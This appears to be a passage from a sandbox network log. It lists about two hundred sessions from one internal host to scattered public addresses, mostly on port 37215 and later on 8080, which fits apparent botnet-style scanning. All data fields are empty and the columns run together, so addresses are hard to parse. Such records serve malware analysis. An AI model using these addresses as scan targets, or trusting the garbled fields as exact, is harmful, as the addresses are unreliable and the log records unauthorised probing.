                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7326192.168.2.2353616157.160.85.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7327192.168.2.2345022197.198.27.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7328192.168.2.2334714173.142.167.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7329192.168.2.2335056197.128.124.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7330192.168.2.234056886.254.47.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7331192.168.2.2333180174.36.217.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7332192.168.2.2335032197.145.5.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7333192.168.2.234483441.251.204.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7334192.168.2.235836641.149.228.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7335192.168.2.235754641.34.100.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7336192.168.2.2342636197.158.127.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7337192.168.2.2333472157.133.208.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7338192.168.2.2337812197.41.198.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7339192.168.2.2345110197.104.199.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7340192.168.2.233620441.211.88.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7341192.168.2.23534545.64.161.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7342192.168.2.2336686197.30.162.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7343192.168.2.2352156157.146.6.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7344192.168.2.2337008157.190.138.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7345192.168.2.2344302193.37.86.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7346192.168.2.2360970157.223.145.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7347192.168.2.233690641.255.108.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7348192.168.2.2342322197.253.38.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7349192.168.2.2357846197.57.45.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7350192.168.2.234381695.43.62.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7351192.168.2.2358876134.217.95.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7352192.168.2.2359954145.231.241.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7353192.168.2.2347432197.45.42.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7354192.168.2.234431841.105.29.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7355192.168.2.2348304112.245.88.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7356192.168.2.2339452157.182.73.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7357192.168.2.2340326197.64.154.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7358192.168.2.2353986111.205.133.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7359192.168.2.233490841.186.63.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7360192.168.2.235816641.217.102.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7361192.168.2.2340016219.59.34.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7362192.168.2.233930241.222.1.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7363192.168.2.2344710157.132.38.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7364192.168.2.235561688.135.140.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7365192.168.2.2358286208.23.12.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7366192.168.2.2357944198.53.33.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7367192.168.2.2336356204.15.193.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7368192.168.2.235583838.10.160.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7369192.168.2.235967469.126.100.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7370192.168.2.2338580189.115.127.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7371192.168.2.2357140144.154.4.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7372192.168.2.2337288116.17.190.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7373192.168.2.235301657.154.171.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7374192.168.2.2339328165.48.121.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7375192.168.2.235524837.201.208.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7376192.168.2.2342492184.16.190.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7377192.168.2.233390448.190.241.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7378192.168.2.234152836.75.53.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7379192.168.2.235097044.29.139.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7380192.168.2.234944080.18.22.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7381192.168.2.234373298.107.247.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7382192.168.2.2346274163.163.108.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7383192.168.2.2351254153.33.11.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7384192.168.2.2349322149.69.33.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7385192.168.2.234744052.11.25.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7386192.168.2.235727643.197.28.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7387192.168.2.234814682.255.150.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7388192.168.2.234503839.233.65.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7389192.168.2.2339916113.62.166.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7390192.168.2.2342140153.197.204.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7391192.168.2.2351466167.21.132.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7392192.168.2.2335752157.241.200.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7393192.168.2.23467744.192.55.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7394192.168.2.2359176217.190.62.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7395192.168.2.2336534105.217.94.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7396192.168.2.234370874.36.149.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7397192.168.2.2338818100.62.233.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7398192.168.2.2344796203.130.194.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7399192.168.2.2352674101.1.5.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7400192.168.2.2336272180.165.245.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7401192.168.2.2353662151.254.3.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7402192.168.2.235440039.72.36.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7403192.168.2.234211854.21.54.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7404192.168.2.2354824218.89.66.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7405192.168.2.2343062199.182.32.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7406192.168.2.235801023.245.41.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7407192.168.2.233291875.129.205.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7408192.168.2.234464852.59.146.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7409192.168.2.2340582190.86.241.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7410192.168.2.235303491.84.79.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7411192.168.2.234271476.177.223.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7412192.168.2.2349012182.161.143.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7413192.168.2.235130259.62.238.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7414192.168.2.2360084180.250.44.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7415192.168.2.2351734199.27.139.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7416192.168.2.2347996188.27.187.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7417192.168.2.2355948105.234.70.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7418192.168.2.2341536210.107.22.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7419192.168.2.2337242148.130.135.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7420192.168.2.2337752175.57.13.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7421192.168.2.2355236108.90.10.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7422192.168.2.2340500221.75.96.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7423192.168.2.234433287.145.209.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7424192.168.2.2336712118.31.178.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7425192.168.2.2335518112.227.139.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7426192.168.2.235968041.233.57.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7427192.168.2.2338446115.136.126.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7428192.168.2.233664057.221.79.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7429192.168.2.2347342174.73.215.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7430192.168.2.234857452.9.180.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7431192.168.2.2352084173.62.108.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7432192.168.2.2336254199.210.38.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7433192.168.2.234575819.46.143.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7434192.168.2.234522442.151.38.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7435192.168.2.2343964184.117.174.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7436192.168.2.2350704219.60.209.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7437192.168.2.234297031.40.16.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7438192.168.2.2352964191.85.76.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7439192.168.2.2355124142.73.211.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7440192.168.2.2360612160.206.247.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7441192.168.2.2354372195.205.62.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7442192.168.2.2337710208.2.208.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7443192.168.2.2340336177.90.90.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7444192.168.2.2353024201.148.93.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7445192.168.2.235152468.27.1.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7446192.168.2.2349800107.23.238.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7447192.168.2.2351378201.97.178.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7448192.168.2.2340780171.121.192.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7449192.168.2.2346714219.234.132.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7450192.168.2.234969071.94.205.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7451192.168.2.235749465.166.156.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7452192.168.2.233981060.59.68.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7453192.168.2.2336996161.199.32.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7454192.168.2.23608805.8.228.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7455192.168.2.235894286.5.108.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7456192.168.2.2351814136.60.65.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7457192.168.2.235042098.206.29.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7458192.168.2.2348740193.110.186.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7459192.168.2.2353994193.8.106.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7460192.168.2.2348216146.81.23.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7461192.168.2.233759470.156.31.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7462192.168.2.235915625.226.118.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7463192.168.2.233843859.120.214.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7464192.168.2.234001613.149.148.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7465192.168.2.233361837.231.3.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7466192.168.2.23418405.55.207.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7467192.168.2.2357684117.206.100.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7468192.168.2.23468725.69.106.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7469192.168.2.2352802138.54.131.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7470192.168.2.2360798166.41.81.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7471192.168.2.2340572169.81.51.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7472192.168.2.2347402195.50.225.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7473192.168.2.2339024223.246.133.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7474192.168.2.235568827.184.154.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7475192.168.2.235745036.252.97.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7476192.168.2.2348826190.156.234.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7477192.168.2.23591128.245.59.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7478192.168.2.233486823.167.243.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7479192.168.2.2360748161.174.153.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7480192.168.2.2349446126.156.30.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7481192.168.2.2343910109.20.204.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7482192.168.2.2353650178.244.13.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7483192.168.2.2351322202.43.14.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7484192.168.2.234293451.181.161.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7485192.168.2.235461077.49.62.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7486192.168.2.2333778190.79.161.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7487192.168.2.234214679.156.186.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7488192.168.2.234214214.210.96.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7489192.168.2.235587645.96.204.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7490192.168.2.2356682148.230.233.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7491192.168.2.2338848211.70.202.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7492192.168.2.2353210213.169.184.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7493192.168.2.2341376114.27.125.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7494192.168.2.2349816156.75.144.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7495192.168.2.2351084123.218.144.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7496192.168.2.2357646139.207.179.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7497192.168.2.234039290.231.1.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7498192.168.2.2349166174.6.186.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7499192.168.2.2359556129.71.122.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7500192.168.2.234319014.186.139.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7501192.168.2.2336510121.81.114.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7502192.168.2.234867676.123.31.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7503192.168.2.2355390182.79.116.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7504192.168.2.2334890216.204.220.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7505192.168.2.234444039.64.90.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7506192.168.2.236061096.98.84.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7507192.168.2.2338596165.87.145.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7508192.168.2.235573299.68.8.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7509192.168.2.235685624.231.22.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7510192.168.2.235086232.0.88.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7511192.168.2.2344110122.46.52.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7512192.168.2.2359166222.69.133.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7513192.168.2.2343794206.25.241.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7514192.168.2.2346450200.188.68.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7515192.168.2.234842835.56.126.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7516192.168.2.2340546101.129.127.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7517192.168.2.234460679.182.228.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7518192.168.2.2348150186.144.134.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7519192.168.2.2351154184.30.43.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7520192.168.2.233703282.220.99.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7521192.168.2.2343554201.24.64.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7522192.168.2.2340998213.159.15.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7523192.168.2.2355090205.209.194.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7524192.168.2.2349438109.200.254.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7525192.168.2.2341664170.82.16.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7526192.168.2.2354582163.154.79.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7527192.168.2.235935654.35.174.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7528192.168.2.234762217.106.51.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7529192.168.2.2358112159.92.236.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7530192.168.2.2343264219.236.223.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7531192.168.2.233726887.76.201.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7532192.168.2.2342618207.13.31.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7533192.168.2.2345164194.94.132.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7534192.168.2.2347004126.210.50.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7535192.168.2.234030842.3.68.858080
                                                        TimestampBytes transferredDirectionData


